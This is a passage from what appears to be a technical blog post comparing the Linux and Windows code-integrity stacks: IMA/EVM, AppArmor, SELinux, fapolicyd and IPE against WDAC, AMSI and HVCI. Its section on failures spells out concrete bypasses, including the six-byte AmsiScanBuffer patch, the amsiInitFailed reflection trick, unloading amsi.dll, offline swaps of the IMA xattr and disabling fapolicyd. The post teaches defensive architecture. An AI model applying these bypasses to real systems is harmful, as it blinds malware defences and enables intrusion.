&lt;p&gt;The Linux answer was EVM (HMAC the extended attributes that IMA depends on) and IPE (decide on immutable file properties rather than file contents). The Windows answer was HVCI (lift the kernel-mode code-integrity check into a hypervisor-isolated secure kernel). The names are different. The lesson is one.&lt;/p&gt;
&lt;p&gt;Why did Linux and Windows arrive at such different architectures in the first place? That story starts in an IBM research lab in 2003.&lt;/p&gt;
&lt;h2&gt;2. The question both operating systems are trying to answer&lt;/h2&gt;
&lt;p&gt;Both lineages exist to answer one question -- &quot;is this code allowed to run?&quot; -- but they put the check in completely different places. Before we can compare them honestly, we need a shared vocabulary for the three layers any production code-integrity stack must cover.&lt;/p&gt;
&lt;p&gt;The first layer is &lt;strong&gt;code integrity&lt;/strong&gt; itself, often abbreviated CI: a gate on the file&apos;s content or its signer. Did this &lt;code&gt;.so&lt;/code&gt; come from a package my distribution signed? Does this &lt;code&gt;.exe&lt;/code&gt; match an &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode chain&lt;/a&gt; rooted in a publisher my policy trusts? The answer is binary. The hook fires before the process loads the bytes.&lt;/p&gt;
&lt;p&gt;The second layer is &lt;strong&gt;mandatory access control&lt;/strong&gt;, or MAC. Now the process is running. What can it do? Can &lt;code&gt;nginx&lt;/code&gt; open &lt;code&gt;/etc/shadow&lt;/code&gt;? Can &lt;code&gt;mshta.exe&lt;/code&gt; spawn &lt;code&gt;cmd.exe&lt;/code&gt;? MAC is enforced by the kernel above discretionary access control and cannot be overridden by userspace privileges.&lt;/p&gt;

A kernel-enforced policy layer above traditional discretionary access control (DAC). Unlike DAC, where the file owner sets permissions, MAC policy is set by the system administrator and applied uniformly to all processes; no user, including root, can override it without changing the policy itself.
&lt;p&gt;The third layer is &lt;strong&gt;content inspection&lt;/strong&gt;: gating not on the file but on the buffer the interpreter is about to evaluate. The PowerShell engine has just deobfuscated a long string into a script block. Is the script block malicious? Linux has no production equivalent. Windows ships AMSI [@learn-microsoft-com-interface-portal] for exactly this.&lt;/p&gt;
&lt;p&gt;Where each operating system puts these checks tells you almost everything about its architectural philosophy.&lt;/p&gt;
&lt;p&gt;Linux puts every check on a Linux Security Module hook [@kernel-org-security-lsmhtml]. IMA registers at &lt;code&gt;bprm_check&lt;/code&gt; (the kernel hook that fires when a binary is about to be executed), &lt;code&gt;file_mmap&lt;/code&gt; with &lt;code&gt;MAY_EXEC&lt;/code&gt;, &lt;code&gt;module_check&lt;/code&gt;, &lt;code&gt;firmware_check&lt;/code&gt;, and &lt;code&gt;kexec_*&lt;/code&gt;. AppArmor and SELinux register at the syscall-level access hooks. &lt;code&gt;fapolicyd&lt;/code&gt; rides on top of &lt;code&gt;fanotify&lt;/code&gt;. IPE hooks &lt;code&gt;op=EXECUTE&lt;/code&gt;. The kernel is the trust boundary, and every mechanism is a polite tenant inside it.&lt;/p&gt;

The kernel framework, merged into Linux 2.6.0 in December 2003, that hosts pluggable security modules at well-defined hook points in the kernel. LSMs include SELinux, AppArmor, Smack, Tomoyo, IMA, EVM, IPE, BPF LSM, and Landlock; multiple modules can coexist via &quot;LSM stacking&quot;.
&lt;p&gt;Windows takes the opposite path. The PE loader is the gate for user-mode code integrity (UMCI). The kernel-mode code-integrity check is, in the modern stack, moved out of the normal kernel into a small secure kernel running on top of Hyper-V -- Hypervisor-protected Code Integrity, HVCI [@learn-microsoft-com-code-integrity]. The script broker runs in-process with each scripting host. Cloud reputation is consulted via the Intelligent Security Graph and exposed to consumers as &lt;a href=&quot;https://paragmali.com/blog/mark-of-the-web-smartscreen-catalog-of-trust/&quot; rel=&quot;noopener&quot;&gt;Smart App Control&lt;/a&gt;.&lt;/p&gt;

A monotonically extendable hash register inside a Trusted Platform Module. New measurements are folded in with `PCR_new = SHA256(PCR_old || measurement)`. Once extended, the value cannot be rolled back without resetting the TPM. IMA extends file-content hashes into PCR 10; the Windows Measured Boot chain uses PCRs 0-7 and 11-14.
&lt;p&gt;The architectural philosophy comes down to a sentence each. Linux trusts the &lt;strong&gt;kernel surface&lt;/strong&gt; and packs every integrity mechanism into it as a separate LSM. Windows trusts a &lt;strong&gt;hypervisor-isolated secure kernel&lt;/strong&gt; and uses it to host the integrity logic the normal kernel cannot be trusted to run honestly.&lt;/p&gt;

flowchart LR
  subgraph CI[Code integrity: gate on file content or signer]
    direction TB
    L_IMA[Linux: IMA + EVM]
    L_IPE[Linux: IPE]
    L_FSV[Linux: fs-verity]
    L_FAP[Linux: fapolicyd]
    W_WDAC[Windows: App Control / WDAC]
    W_HVCI[Windows: HVCI / Memory Integrity]
    W_SAC[Windows: Smart App Control]
  end
  subgraph MAC[Mandatory access control: gate on running process behaviour]
    direction TB
    L_AA[Linux: AppArmor]
    L_SE[Linux: SELinux]
    W_NONE[Windows: no direct analogue, closest is AppContainer / ASR]
  end
  subgraph CS[Content inspection: gate on the buffer the interpreter will evaluate]
    direction TB
    W_AMSI[Windows: AMSI]
    L_GAP[Linux: no production equivalent]
  end
  CI --&amp;gt; MAC --&amp;gt; CS
&lt;p&gt;Neither stack started this way. The 2026 stack on each side is the accumulated answer to fifteen years of failures. Here is how they grew up.&lt;/p&gt;
&lt;h2&gt;3. Two genesis stories&lt;/h2&gt;
&lt;p&gt;In 2003, four IBM researchers at the T. J. Watson Research Center -- Reiner Sailer, Xiaolan Zhang, Trent Jaeger, and Leendert van Doorn -- tried to convince the USENIX Security community that you could prove the integrity of a Linux web server to a remote verifier. Their paper, &lt;em&gt;Design and Implementation of a TCG-based Integrity Measurement Architecture&lt;/em&gt; [@usenix-org-tech-sailerhtml], shipped at the 13th USENIX Security Symposium in 2004. It proposed hashing every executable file at load time, extending each hash into a &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM platform configuration register&lt;/a&gt;, and sending the resulting measurement list to a remote verifier who could compare it to a known-good manifest.&lt;/p&gt;
&lt;p&gt;The performance evaluation [@usenix-org-sailerhtml-node19html] measured the cost on an IBM Netvista with a 2.4 GHz Pentium 4: the &lt;code&gt;file_mmap&lt;/code&gt; LSM hook added 0.08 microseconds per call on a cache hit, and SHA-1 fingerprinting ran at roughly 80 MB/s. The headline claim was that more than 99.9% of measure calls landed on the cached path, so the overhead was essentially free.Pentium 4-era SHA-1 at 80 MB/s vs Ice Lake-era SHA-NI-accelerated SHA-256 at roughly 2 GB/s per core: a 25x throughput jump in twenty years. The original paper&apos;s qualitative finding -- cache hit dominates, overhead is negligible -- holds even more strongly on modern silicon.&lt;/p&gt;
&lt;p&gt;It took five years for that proposal to reach the kernel. IMA&apos;s measurement-only mode was merged in Linux 2.6.30 in June 2009. It hashed files at &lt;code&gt;bprm_check&lt;/code&gt;, &lt;code&gt;file_mmap&lt;/code&gt;, and &lt;code&gt;module_check&lt;/code&gt;, extended TPM PCR 10, and otherwise let everything run.&lt;/p&gt;
&lt;p&gt;The &quot;is this hash allowed?&quot; question would have to wait three more years. The Extended Verification Module landed in Linux 3.2 in January 2012; digital-signature mode for EVM followed in 3.3 in March 2012; and IMA-appraise, the enforcement extension that finally let the kernel return &lt;code&gt;-EPERM&lt;/code&gt; when a file&apos;s hash did not match &lt;code&gt;security.ima&lt;/code&gt;, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. The same LWN article frames the cadence plainly: &quot;Much of IMA was added to the kernel in 2.6.30, but another piece, the extended verification module (EVM) was not merged until 3.2 ... Digital signature support was added to EVM in 3.3, and IMA appraisal is currently under review.&quot; Mimi Zohar&apos;s appraisal patchset [@lwn-net-articles-487700] is the canonical lore.kernel.org artifact of that final step.&lt;/p&gt;
&lt;p&gt;AppArmor took a different, longer road. It was born inside Immunix in 1998 under the name &quot;SubDomain&quot;, a path-based confinement layer designed to stop privilege-escalation exploits from doing anything the binary&apos;s profile did not name. Novell acquired Immunix in 2005, renamed SubDomain to AppArmor, and shipped it as the default mandatory access control layer on SLES and openSUSE. According to the Ubuntu AppArmor wiki [@wiki-ubuntu-com-apparmor], &quot;AppArmor support was first introduced in Ubuntu 7.04, and is turned on by default in Ubuntu 7.10 and later&quot; -- so by October 2007 AppArmor was already a default-on production MAC on the most-deployed Linux desktop distribution.&lt;/p&gt;
&lt;p&gt;Mainlining did not happen until October 2010, when AppArmor finally landed in Linux 2.6.36 [@docs-kernel-org-lsm-apparmorhtml]. Seven years out of tree, three years default-on in Ubuntu, before the kernel community accepted it.&lt;/p&gt;
&lt;p&gt;The contrast with SELinux [@en-wikipedia-org-security-enhancedlinux] is sharp. SELinux merged into Linux 2.6.0 in December 2003 -- barely a year after the LSM framework was created. SELinux was, in fact, the reason the LSM framework existed.&lt;/p&gt;

SELinux&apos;s type-enforcement model maps directly to LSM&apos;s &quot;label the subject, label the object, look up the rule&quot; hook signature. AppArmor&apos;s path-based reasoning does not. LSM hooks see inodes, not paths -- and an inode can be reached from many paths (bind mounts, hard links, namespace games, chroots). To merge, AppArmor had to push kernel-side helpers like `vfs_path_lookup` and `d_absolute_path` upstream so it could reconstruct the absolute path of the object at hook time. The conceptual fight took three rejected merge attempts and seven years. The lesson is one Linux kernel reviewers have repeated since: a security model is not just an algorithm, it is a commitment to a particular kind of name-resolution semantics.
&lt;p&gt;The Windows lineage starts in a different building entirely. AppLocker shipped with Windows 7 and Windows Server 2008 R2 in 2009: a user-mode-only allowlist, with no hypervisor or kernel-mode backing, and rules tied to file paths, publishers, or hashes. AppLocker is still supported on modern Windows but &quot;isn&apos;t getting new feature improvements&quot; [@learn-microsoft-com-applocker-overview]; the modern successor is App Control for Business.&lt;/p&gt;
&lt;p&gt;Windows 10 RTM (version 1507, July 2015) shipped the first version of Device Guard along with AMSI [@learn-microsoft-com-interface-portal] and PowerShell 5.0, which integrated with AMSI from day one. Device Guard became known as Windows Defender Application Control (WDAC) and then, in 2024, was renamed once more to &lt;em&gt;App Control for Business&lt;/em&gt;. User-mode code integrity (UMCI) became a policy option, FilePath rules were added in Windows 10 version 1903 [@learn-microsoft-com-applocker-overview], multiple-policy authoring landed in the same release, and Smart App Control made its consumer debut in Windows 11 22H2 in September 2022 [@blogs-windows-com-2022-update].&lt;/p&gt;

gantt
  title Linux and Windows code-integrity timeline
  dateFormat YYYY-MM
  axisFormat %Y
  section Linux
  SELinux mainline 2.6.0    :2003-12, 12M
  AppArmor at Immunix       :1998-01, 84M
  AppArmor default in Ubuntu :2007-10, 36M
  IMA mainline 2.6.30        :2009-06, 32M
  EVM mainline 3.2           :2012-01, 2M
  EVM digital sigs 3.3       :2012-03, 9M
  IMA-appraise 3.7           :2012-12, 24M
  AppArmor mainline 2.6.36   :2010-10, 14M
  fs-verity 5.4              :2019-11, 60M
  IPE 6.12                   :2024-11, 12M
  section Windows
  AppLocker (Win 7)          :2009-10, 70M
  Device Guard + AMSI + PowerShell 5 (1507) :2015-07, 25M
  WDAC UMCI (1709)           :2017-10, 18M
  FilePath rules + multi-policy (1903) :2019-05, 24M
  HVCI broadens (Win 10 1607+) :2016-08, 60M
  Smart App Control (Win 11 22H2) :2022-09, 24M
  App Control for Business rename :2024-01, 12M
&lt;p&gt;Two timelines, two design philosophies, both shipping their v1 with the same kind of mistake. The next section makes that concrete.&lt;/p&gt;
&lt;h2&gt;4. Where the naive approach breaks&lt;/h2&gt;
&lt;p&gt;Both stacks shipped their first version with the check in the wrong place. Two stories make this concrete; two more refine it.&lt;/p&gt;
&lt;h3&gt;Story A: IMA-as-shipped (2009) without EVM&lt;/h3&gt;
&lt;p&gt;When IMA reached the kernel in Linux 2.6.30, it hashed the file at &lt;code&gt;bprm_check&lt;/code&gt; and stored the reference hash in the file&apos;s &lt;code&gt;security.ima&lt;/code&gt; extended attribute. That is what an attacker with offline disk access needs to defeat the check, and exactly nothing else. Mount the filesystem from another box, swap the binary for a malicious one, recompute the SHA over the new binary, write the new value into &lt;code&gt;security.ima&lt;/code&gt;. Boot the box. The kernel hashes the malicious binary at exec, reads the matching xattr the attacker just wrote, and lets the syscall through.&lt;/p&gt;
&lt;p&gt;This is the offline-tampering attacker model EVM was designed to defeat. The contemporaneous LWN coverage put it plainly: &quot;IMA can be subverted by &apos;offline&apos; attacks, where file data or metadata is changed out from under IMA. Mimi Zohar has proposed the extended verification module (EVM) patch set as a means to protect against these offline attacks.&quot; [@lwn-net-articles-394170]&lt;/p&gt;
&lt;p&gt;The EVM v5 patchset [@lwn-net-articles-443038], posted by Zohar in May 2011, describes the design directly: &quot;Extended Verification Module (EVM) detects offline tampering of the security extended attributes (e.g. security.selinux, security.SMACK64, security.ima) ... initial method maintains an HMAC-sha1 across a set of security extended attributes, storing the HMAC as the extended attribute &apos;security.evm&apos;.&quot;&lt;/p&gt;
&lt;h3&gt;Story B: AMSI as shipped (2015) inside the script host&lt;/h3&gt;
&lt;p&gt;AMSI&apos;s design is documented in &lt;em&gt;How AMSI helps you defend against malware&lt;/em&gt; [@learn-microsoft-com-amsi-helps]: &quot;Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code. And that&apos;s the point at which you invoke the AMSI APIs.&quot;&lt;/p&gt;
&lt;p&gt;A scripting host -- PowerShell, WSH, MSHTA, Office VBA, the UAC installer dialog -- calls &lt;code&gt;AmsiInitialize&lt;/code&gt;, then for every plain-text script buffer it is about to execute calls &lt;code&gt;AmsiScanBuffer&lt;/code&gt; [@learn-microsoft-com-amsi-amsiscanbuffer] or &lt;code&gt;AmsiScanString&lt;/code&gt;. The call is routed through &lt;code&gt;amsi.dll&lt;/code&gt;, loaded into the host process, which dispatches to the registered &lt;code&gt;IAntimalwareProvider&lt;/code&gt; COM server. Defender is the default provider.&lt;/p&gt;
&lt;p&gt;The detection logic is sound. The trust boundary is not. The attacker already controls the script host. Three single-shot bypass techniques have lived in red-team toolkits since 2016:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Patch &lt;code&gt;AmsiScanBuffer&lt;/code&gt;&apos;s prologue in memory to &lt;code&gt;mov eax, 0; ret&lt;/code&gt; (&lt;code&gt;B8 00 00 00 00 C3&lt;/code&gt;). Six bytes of opcode rewrite, no syscalls required, blinds the scanner permanently for this process.&lt;/li&gt;
&lt;li&gt;Set &lt;code&gt;System.Management.Automation.AmsiUtils.amsiInitFailed = true&lt;/code&gt; via reflection. PowerShell checks the flag on every scan path and short-circuits.&lt;/li&gt;
&lt;li&gt;Unload &lt;code&gt;amsi.dll&lt;/code&gt; via &lt;code&gt;FreeLibrary&lt;/code&gt;. There is no scanner left to call.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Microsoft tracks this so closely that its own &quot;Applications that can bypass App Control&quot; [@learn-microsoft-com-bypass-appcontrol] deny list calls out the AMSI-bypass-capable versions of &lt;code&gt;system.management.automation.dll&lt;/code&gt; by hash. The defender&apos;s authoritative list of files-to-block treats specific signed Microsoft DLLs as named threats.The same Microsoft bypass list also enumerates &lt;code&gt;mshta.exe&lt;/code&gt;, &lt;code&gt;wscript.exe&lt;/code&gt;, &lt;code&gt;cscript.exe&lt;/code&gt;, &lt;code&gt;msbuild.exe&lt;/code&gt;, &lt;code&gt;Microsoft.Build.dll&lt;/code&gt;, &lt;code&gt;windbg.exe&lt;/code&gt;, &lt;code&gt;cdb.exe&lt;/code&gt;, &lt;code&gt;kd.exe&lt;/code&gt;, &lt;code&gt;dotnet.exe&lt;/code&gt;, &lt;code&gt;csi.exe&lt;/code&gt;, &lt;code&gt;rcsi.exe&lt;/code&gt;, &lt;code&gt;addinprocess.exe&lt;/code&gt;, &lt;code&gt;wmic.exe&lt;/code&gt;, &lt;code&gt;bash.exe&lt;/code&gt;, &lt;code&gt;wsl.exe&lt;/code&gt;, &lt;code&gt;runscripthelper.exe&lt;/code&gt;, and dozens of others -- 40+ entries today, growing whenever a new Microsoft-signed binary turns out to host an attacker-friendly evaluator.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The host process making the AMSI call is the same process the attacker is running in. Any defence-in-depth plan that treats AMSI as a hard control is mis-specified. Treat AMSI as a high-quality telemetry surface feeding Defender for Endpoint and EDR pipelines; budget for the bypass.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{`
// In Windows, AMSI scans each plain-text script buffer just before
// the scripting engine evaluates it. The scanner lives in amsi.dll,
// loaded into the script host process. The attacker who controls
// that process can rewrite the function&apos;s first few bytes.
//
// This toy model shows the consequence: once &quot;patched&quot;, the scanner
// returns CLEAN regardless of input, and the assertion below holds
// for every possible payload.&lt;/p&gt;
&lt;p&gt;const AMSI_RESULT_CLEAN = 0;
const AMSI_RESULT_MALWARE = 32768;&lt;/p&gt;
&lt;p&gt;function amsiScanBuffer(buf, patched) {
  if (patched) return AMSI_RESULT_CLEAN;
  if (buf.includes(&quot;Invoke-Mimikatz&quot;)) return AMSI_RESULT_MALWARE;
  return AMSI_RESULT_CLEAN;
}&lt;/p&gt;
&lt;p&gt;console.log(&quot;Normal mode:&quot;);
console.log(&quot;  clean payload:    &quot;, amsiScanBuffer(&quot;Get-Process&quot;, false));
console.log(&quot;  malicious payload:&quot;, amsiScanBuffer(&quot;Invoke-Mimikatz&quot;, false));&lt;/p&gt;
&lt;p&gt;console.log(&quot;\nAfter six-byte patch:&quot;);
console.log(&quot;  clean payload:    &quot;, amsiScanBuffer(&quot;Get-Process&quot;, true));
console.log(&quot;  malicious payload:&quot;, amsiScanBuffer(&quot;Invoke-Mimikatz&quot;, true));&lt;/p&gt;
&lt;p&gt;// The takeaway: no input ever produces MALWARE once the scanner is patched.
// Strengthening AMSI&apos;s signature engine cannot fix this. The scanner
// must move out of the script host&apos;s address space.
`}&lt;/p&gt;
&lt;h3&gt;Story C: WDAC&apos;s &quot;trust all Microsoft-signed code&quot; anti-pattern&lt;/h3&gt;
&lt;p&gt;A &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;WDAC policy&lt;/a&gt; that trusts code signed by Microsoft also trusts every binary Microsoft has ever signed. That set includes &lt;code&gt;mshta.exe&lt;/code&gt;, &lt;code&gt;wscript.exe&lt;/code&gt;, &lt;code&gt;cscript.exe&lt;/code&gt;, &lt;code&gt;msbuild.exe&lt;/code&gt;, &lt;code&gt;wmic.exe&lt;/code&gt;, &lt;code&gt;system.management.automation.dll&lt;/code&gt;, and the 40-plus other binaries enumerated on Microsoft&apos;s own App Control bypass list [@learn-microsoft-com-bypass-appcontrol]. The LOLBAS community catalogue [@lolbas-project-github-io] widens the field to roughly 200 living-off-the-land binaries with explicit MITRE ATT&amp;amp;CK technique mappings.&lt;/p&gt;
&lt;p&gt;The pattern is structural: WDAC grants trust at &lt;em&gt;signer&lt;/em&gt; granularity (a chain rooted at &quot;Microsoft Corporation&quot;); attackers exploit at &lt;em&gt;binary&lt;/em&gt; granularity (the specific &lt;code&gt;mshta.exe&lt;/code&gt; that will happily evaluate an HTA blob containing a PowerShell stager). Any non-trivial WDAC policy must therefore contain explicit hash-level denies for the known-bad versions, and must keep growing those denies as Microsoft ships new signed binaries.&lt;/p&gt;
&lt;h3&gt;Story D: fapolicyd&apos;s permissive-window failure&lt;/h3&gt;
&lt;p&gt;fapolicyd [@access-redhat-com-fapolicydsecurity-hardening] is the Red Hat userspace allowlister. It sits on the &lt;code&gt;fanotify&lt;/code&gt; permission channel and answers &quot;may this open or exec proceed?&quot; against a compiled rule database. It does not have IMA&apos;s offline-tampering problem because trust is inherited from the RPM database: &quot;An application is trusted when the system package manager correctly installs it and therefore registered in the system RPM database. The fapolicyd daemon uses the RPM database as a list of trusted binaries and scripts.&quot;&lt;/p&gt;
&lt;p&gt;What it does have is an operational footgun. Setting &lt;code&gt;permissive=1&lt;/code&gt; &quot;just for troubleshooting&quot; silently disables enforcement. Terminating the daemon causes the kernel to fail open after the fanotify response timeout. The architectural choice -- userspace daemon over kernel-mode hook -- is what makes both failure modes possible.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The check was strong. The boundary protecting the check was weak. On IMA-as-shipped the reference hash sat next to the file the attacker rewrote. On AMSI the scanner sat inside the process the attacker controlled. On WDAC the trust grant was wider than the exploitation unit. On fapolicyd the verifier was a userspace process that could be terminated. Four different stacks, four different boundary failures, one identical lesson.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bypass class&lt;/th&gt;
&lt;th&gt;Stack&lt;/th&gt;
&lt;th&gt;Concrete example&lt;/th&gt;
&lt;th&gt;Root cause&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Offline metadata swap&lt;/td&gt;
&lt;td&gt;IMA without EVM&lt;/td&gt;
&lt;td&gt;Rewrite binary and matching &lt;code&gt;security.ima&lt;/code&gt; xattr from rescue media&lt;/td&gt;
&lt;td&gt;Reference value stored next to the file under attacker control&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;In-process scanner patch&lt;/td&gt;
&lt;td&gt;AMSI in PowerShell&lt;/td&gt;
&lt;td&gt;&lt;code&gt;mov eax, AMSI_RESULT_CLEAN; ret&lt;/code&gt; over &lt;code&gt;AmsiScanBuffer&lt;/code&gt; prologue&lt;/td&gt;
&lt;td&gt;Scanner shares address space with the script host the attacker runs in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signer-vs-binary mismatch&lt;/td&gt;
&lt;td&gt;WDAC Publisher rules&lt;/td&gt;
&lt;td&gt;Allow Microsoft-signed code, attacker runs &lt;code&gt;mshta.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Trust grant is coarser than the exploitable unit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Daemon liveness&lt;/td&gt;
&lt;td&gt;fapolicyd&lt;/td&gt;
&lt;td&gt;Terminate &lt;code&gt;fapolicyd&lt;/code&gt; or set &lt;code&gt;permissive=1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Verifier is a userspace process with no kernel-rooted backstop&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Each of these failures has the same shape: the check was strong, the boundary protecting the check was weak. Both operating systems noticed, and fixed it in 2012 and 2016 in very different ways. Both fixes followed the same principle.&lt;/p&gt;
&lt;h2&gt;5. The architectural pivots&lt;/h2&gt;
&lt;p&gt;Both lineages reached the same conclusion at the same time: strengthen the boundary, not the check. Each pivot moved the trust boundary outward, beyond the place the attacker could reach.&lt;/p&gt;
&lt;h3&gt;EVM (Linux 3.2, January 2012): the xattrs become non-forgeable&lt;/h3&gt;
&lt;p&gt;The Extended Verification Module computes an HMAC over the security-relevant extended attributes -- &lt;code&gt;security.ima&lt;/code&gt;, &lt;code&gt;security.selinux&lt;/code&gt;, &lt;code&gt;security.SMACK64&lt;/code&gt;, &lt;code&gt;security.apparmor&lt;/code&gt;, &lt;code&gt;security.capability&lt;/code&gt; -- plus inode metadata (UID, GID, mode, generation), and stores the result in &lt;code&gt;security.evm&lt;/code&gt;. The HMAC key is loaded into the kernel keyring at boot, ideally sealed to a TPM 2.0 PCR set so the key is not retrievable except on a machine whose boot state matches the sealing measurement. The kernel keyring documentation for trusted and encrypted keys [@kernel-org-trusted-encryptedhtml] describes the substrate.&lt;/p&gt;
&lt;p&gt;An offline attacker with disk access still cannot forge &lt;code&gt;security.evm&lt;/code&gt; without the HMAC key. Digital-signature mode (EVM portable signatures, Linux 3.3) gives the same guarantee without any on-box key material. The check did not get cryptographically stronger: HMAC-SHA256 was not new in 2012. What changed was that the &lt;em&gt;reference value&lt;/em&gt; the check consults moved from &quot;an xattr next to the file&quot; to &quot;an xattr whose integrity is bound to a key the attacker does not have&quot;. Red Hat documents the modern setup in &lt;em&gt;Enhancing security with the kernel integrity subsystem&lt;/em&gt; [@access-redhat-com-subsystemsecurity-hardening].&lt;/p&gt;

The Linux integrity module that protects the security-relevant extended attributes IMA depends on. EVM computes an HMAC (or digital signature) over the xattr set plus inode metadata and stores it in `security.evm`. Without the EVM key, an offline attacker cannot rewrite a binary and its matching `security.ima` to produce a valid pair.

sequenceDiagram
  participant App as User app
  participant K as Kernel
  participant FS as Filesystem
  participant IMA as IMA
  participant EVM as EVM
  participant TPM as TPM keyring
  App-&amp;gt;&amp;gt;K: execve(&quot;/usr/bin/foo&quot;)
  K-&amp;gt;&amp;gt;IMA: bprm_check hook
  IMA-&amp;gt;&amp;gt;FS: read file bytes
  IMA-&amp;gt;&amp;gt;IMA: compute SHA-256
  IMA-&amp;gt;&amp;gt;FS: read security.ima xattr
  IMA-&amp;gt;&amp;gt;EVM: verify xattr integrity
  EVM-&amp;gt;&amp;gt;FS: read security.evm and full xattr set
  EVM-&amp;gt;&amp;gt;TPM: HMAC key from keyring (sealed to PCRs)
  EVM-&amp;gt;&amp;gt;EVM: recompute HMAC over xattr set + inode meta
  alt HMAC matches and IMA hash matches
    EVM--&amp;gt;&amp;gt;IMA: ok
    IMA--&amp;gt;&amp;gt;K: allow
    K--&amp;gt;&amp;gt;App: exec proceeds
  else mismatch
    EVM--&amp;gt;&amp;gt;IMA: -EPERM
    IMA--&amp;gt;&amp;gt;K: deny
    K--&amp;gt;&amp;gt;App: -EPERM
  end
&lt;h3&gt;IMA-appraise (Linux 3.7, December 2012): from observation to enforcement&lt;/h3&gt;
&lt;p&gt;The merge cadence on the kernel side is itself part of the story. Measurement-only IMA shipped in 2.6.30 in 2009. EVM merged in 3.2 in January 2012. EVM digital signatures merged in 3.3 in March 2012. IMA-appraise, which finally lets the kernel return &lt;code&gt;-EPERM&lt;/code&gt; on a hash mismatch, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. Three and a half years from &quot;we hash files&quot; to &quot;we refuse to run files that fail the hash&quot;. The gap was not engineering laziness; it was the time it took to design and merge the boundary-strengthening pieces that made enforcement safe to enable.&lt;/p&gt;
&lt;h3&gt;HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel&lt;/h3&gt;
&lt;p&gt;Windows took the equivalent step four years later, but at a different layer. Virtualization-Based Security (VBS) [@learn-microsoft-com-oem-vbs] splits Windows into Virtual Trust Level 0 -- the normal kernel everyone has been writing rootkits for since 1993 -- and Virtual Trust Level 1, a small &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;secure kernel&lt;/a&gt; hosted by Hyper-V. The kernel-mode Code Integrity check that gates loading of every driver is moved into VTL1. A VTL0 attacker with full SYSTEM, even one who has loaded a malicious driver, cannot patch the VTL1 verifier; they cannot even read its memory.&lt;/p&gt;

Windows&apos; Hyper-V-rooted split that puts a small secure kernel in VTL1, isolated from the normal Windows kernel (VTL0) by the hypervisor. Hypervisor-protected Code Integrity (HVCI), exposed in Windows Settings as &quot;Memory integrity&quot;, uses VTL1 to host the kernel-mode code-integrity check, so a VTL0 attacker with SYSTEM cannot patch the verifier or downgrade its policy.
&lt;p&gt;Microsoft&apos;s HVCI documentation [@learn-microsoft-com-oem-vbs] frames the W^X invariant HVCI enforces on kernel pages: &quot;memory integrity ... protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS ... ensuring that kernel memory pages are only made executable after passing code integrity checks inside the secure runtime environment, and executable pages themselves are never writable.&quot; A kernel page can be writable or executable; never both at the same time. The split is enforced by the hypervisor.&quot;HVCI&quot;, &quot;Memory Integrity&quot;, and &quot;kernel-mode code integrity running in VBS&quot; are the same mechanism. Microsoft&apos;s product-name churn here is unusually thick: the Windows Settings UI calls it Memory Integrity, the documentation page is titled &quot;Enable virtualization-based protection of code integrity&quot;, the underlying capability is HVCI, and Microsoft also markets the same hardware-and-software bundle as &quot;Secured-Core PC&quot;.&lt;/p&gt;

flowchart TD
  subgraph VTL0[VTL0: normal Windows kernel]
    P[User process]
    DRV[Driver load request]
    RK[Hypothetical rootkit with SYSTEM]
    K0[NT kernel]
    P --&amp;gt; K0
    DRV --&amp;gt; K0
    RK --&amp;gt; K0
  end
  K0 --&amp;gt;|hypercall: verify driver| HV[Hypervisor]
  RK -.X.-&amp;gt; SK
  HV --&amp;gt; SK
  subgraph VTL1[VTL1: secure kernel]
    SK[Secure kernel]
    CI[Kernel-mode CI verifier]
    SK --&amp;gt; CI
  end
  CI --&amp;gt;|allow / deny| HV
  HV --&amp;gt;|result| K0
&lt;h3&gt;IPE (Linux 6.12, November 2024): property-based decisions&lt;/h3&gt;
&lt;p&gt;The most recent Linux pivot moves further still. Integrity Policy Enforcement [@docs-kernel-org-lsm-ipehtml], upstreamed in Linux 6.12 in November 2024 from a Microsoft-contributed patch series (source on GitHub [@github-com-microsoft-ipe]), does not hash files at all. Its kernel documentation is explicit: &quot;Integrity Policy Enforcement (IPE) is a Linux Security Module that takes a complementary approach to access control. Unlike traditional access control mechanisms that rely on labels and paths for decision-making, IPE focuses on the immutable security properties inherent to system components.&quot; A policy rule looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:&amp;lt;hex&amp;gt; action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY
&lt;/code&gt;&lt;/pre&gt;
